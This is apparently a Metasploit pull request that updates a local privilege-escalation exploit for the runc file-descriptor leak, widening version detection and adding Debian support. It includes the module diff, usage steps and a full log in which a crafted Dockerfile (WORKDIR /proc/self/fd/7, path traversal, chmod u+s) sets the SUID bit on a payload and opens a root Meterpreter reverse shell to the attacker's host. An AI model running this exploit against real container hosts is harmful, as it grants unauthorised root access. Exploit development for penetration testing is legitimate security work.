### PR TITLE
Wider runC version support, add Debian, fix bugs.

### DIFF
--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -84,6 +84,15 @@ class MetasploitModule < Msf::Exploit::Local
     package = cmd_exec('runc --version')
     package = package.split[2] # runc, version, <the actual version>
 
+    # These tokens break Rex::Version comparisons.
+    # Some distro runc packages use them for delimiting.
+    bad_tokens = ['+', '~']
+    bad_tokens.each do |token|
+      if package.include?(token)
+        package = package.split(token).first
+      end
+    end
+
     # From testing, 1.0.0-rc93 < all([1.0.0-rc94, 1.0.0, 1.1.0-rc.1, 1.1.0, 1.1.11])
     if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
       return CheckCode::Appears("Vulnerable runc version #{package} detected")
@@ -136,12 +145,10 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("Removing created docker image #{Regexp.last_match(1)}")
       output = cmd_exec("docker image rm #{Regexp.last_match(1)}")
       output.each_line { |line| vprint_status line.chomp }
+    elsif output.include?("mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory")
+      fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.")
     else
       fail_with(Failure::NoAccess, 'Failed to build docker container. The user may not have docker permissions')
-    end
-
-    if output.include?("mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory")
-      fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.")
     end
 
     unless setuid?(payload_path)

--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Local
           Due to a file descriptor leak it is possible to mount the host file system
           with the permissions of runc (typically root).
 
-          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.
+          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 and runc 1.1.11 using Docker build.
+          Also tested on Debian 12.4.0 with runc 1.1.11 using Docker build.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -59,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),
       OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),
-      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),
+      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 7 ]),
     ]
   end
 
@@ -70,23 +71,21 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     sys_info = get_sysinfo
 
-    unless sys_info[:distro] == 'ubuntu'
-      return CheckCode::Safe('Check method only available for Ubuntu systems')
+    unless sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
+      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
     end
 
-    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')
+    # executable? does not work on windows!
+    if executable?('runc')
+      return CheckCode::Safe('runc is not executable on this system')
+    end
 
     # Check the app is installed and the version, debian based example
     package = cmd_exec('runc --version')
     package = package.split[2] # runc, version, <the actual version>
 
-    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2
-       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched
-       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched
-      return CheckCode::Appears("Vulnerable runc version #{package} detected")
-    end
-
-    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln
+    # From testing, 1.0.0-rc93 < all([1.0.0-rc94, 1.0.0, 1.1.0-rc.1, 1.1.0, 1.1.11])
+    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
       return CheckCode::Appears("Vulnerable runc version #{package} detected")
     end
 
@@ -96,12 +95,17 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
-      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
     end
 
     # Make sure we can write our exploit and payload to the local system
-    unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Make sure docker is present
+    if executable?('docker')
+      fail_with(Failure::BadConfig, 'docker is not executable')
     end
 
     # create directory to write all our files to
@@ -124,18 +128,25 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup("#{dir}/Dockerfile")
 
     print_status('Building from Dockerfile to set our payload permissions')
-    output = cmd_exec "cd #{dir} && docker build ."
+    output = cmd_exec("cd #{dir} && docker build .")
     output.each_line { |line| vprint_status line.chomp }
 
-    # delete our docker image
-    if output =~ /Successfully built ([a-z0-9]+)$/
+    # delete our docker image (second test created for docker v25.0.3)
+    if output =~ /Successfully built ([a-z0-9]+)$/ || output =~ /writing image sha256:([a-z0-9]+) done$/
       print_status("Removing created docker image #{Regexp.last_match(1)}")
-      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"
+      output = cmd_exec("docker image rm #{Regexp.last_match(1)}")
       output.each_line { |line| vprint_status line.chomp }
+    else
+      fail_with(Failure::NoAccess, 'Failed to build docker container. The user may not have docker permissions')
     end
 
-    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"
-    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path
+    if output.include?("mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory")
+      fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.")
+    end
+
+    unless setuid?(payload_path)
+      fail_with(Failure::NoAccess, 'Payload SUID bit not set')
+    end
 
     print_status("Payload permissions set, executing payload (#{payload_path})...")
     cmd_exec "#{payload_path} &"

--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -75,9 +75,13 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
     end
 
-    # executable? does not work on windows!
-    if executable?('runc')
-      return CheckCode::Safe('runc is not executable on this system')
+    # Make sure both docker and runc are present
+    unless command_exists?('runc')
+      return CheckCode::Safe('The runc command was not found on this system')
+    end
+
+    unless command_exists?('docker')
+      return CheckCode::Safe('The docker command was not found on this system')
     end
 
     # Check the app is installed and the version, debian based example
@@ -110,11 +114,6 @@ class MetasploitModule < Msf::Exploit::Local
     # Make sure we can write our exploit and payload to the local system
     unless writable?(base_dir)
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
-    end
-
-    # Make sure docker is present
-    if executable?('docker')
-      fail_with(Failure::BadConfig, 'docker is not executable')
     end
 
     # create directory to write all our files to


### PR DESCRIPTION
updates #18780

Now uses the Gem::Version system to check the user's version of runC. The old system used to allow runC version 1.1.12 (which is patched). Now it allows from 1.0.0-rc93->1.1.11 (and I tested that it works as expected).

Support added for Debian as this was tested with both Debian and Ubuntu.

Newer versions of Docker wouldn't delete the built container due to the message format. I added a new regex to check for the message format which now deletes containers.

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/linux/local/runc_cwd_priv_esc`
- [x] set SESSION <id>
- [x] set LHOST <lhost>
- [x] run
- [x] root shell acquired
- [x] Docker container deleted

## Output
- Regardless of whether ForceExploit was true or false, runC version 1.1.12 used to be treated as vulnerable, which this fixes. 
- Containers were not being deleted due to the output from docker engine below not meeting the regex expectations. 
- FD 7 has always been the correct descriptor so far in my experience, so I have set it as default.

### runC check
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. runc 1.1.12 is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```
### Valid run
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable runc version 1.1.11 detected
[*] Creating directory /tmp/.jwBZNB
[*] /tmp/.jwBZNB created
[*] Uploading Payload to /tmp/.jwBZNB/.cleXu7
[*] Uploading Dockerfile to /tmp/.jwBZNB/Dockerfile
[*] Building from Dockerfile to set our payload permissions
[*] #0 building with "default" instance using docker driver
[*] 
[*] #1 [internal] load build definition from Dockerfile
[*] #1 transferring dockerfile: 217B done
[*] #1 DONE 0.0s
[*] 
[*] #2 [internal] load metadata for docker.io/library/alpine:latest
[*] #2 DONE 3.5s
[*] 
[*] #3 [internal] load .dockerignore
[*] #3 transferring context: 2B done
[*] #3 DONE 0.0s
[*] 
[*] #4 [1/3] FROM docker.io/library/alpine:latest@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
[*] #4 DONE 0.0s
[*] 
[*] #5 [2/3] WORKDIR /proc/self/fd/7
[*] #5 CACHED
[*] 
[*] #6 [3/3] RUN cd ../../../../../../../../ && chmod -R 777 tmp/.jwBZNB && chown -R root:root tmp/.jwBZNB && chmod u+s tmp/.jwBZNB/.cleXu7
[*] #6 DONE 0.3s
[*] 
[*] #7 exporting to image
[*] #7 exporting layers 0.0s done
[*] #7 writing image sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959 done
[*] #7 DONE 0.1s
[*] Removing created docker image 6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Deleted: sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Payload permissions set, executing payload (/tmp/.jwBZNB/.cleXu7)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.20.25
[+] Deleted /tmp/.jwBZNB/.cleXu7
[+] Deleted /tmp/.jwBZNB/Dockerfile
[+] Deleted /tmp/.jwBZNB
[*] Meterpreter session 2 opened (192.168.20.24:4444 -> 192.168.20.25:43178) at 2024-02-07 01:00:02 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.20.25
OS           : Debian 12.4 (Linux 6.1.0-17-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```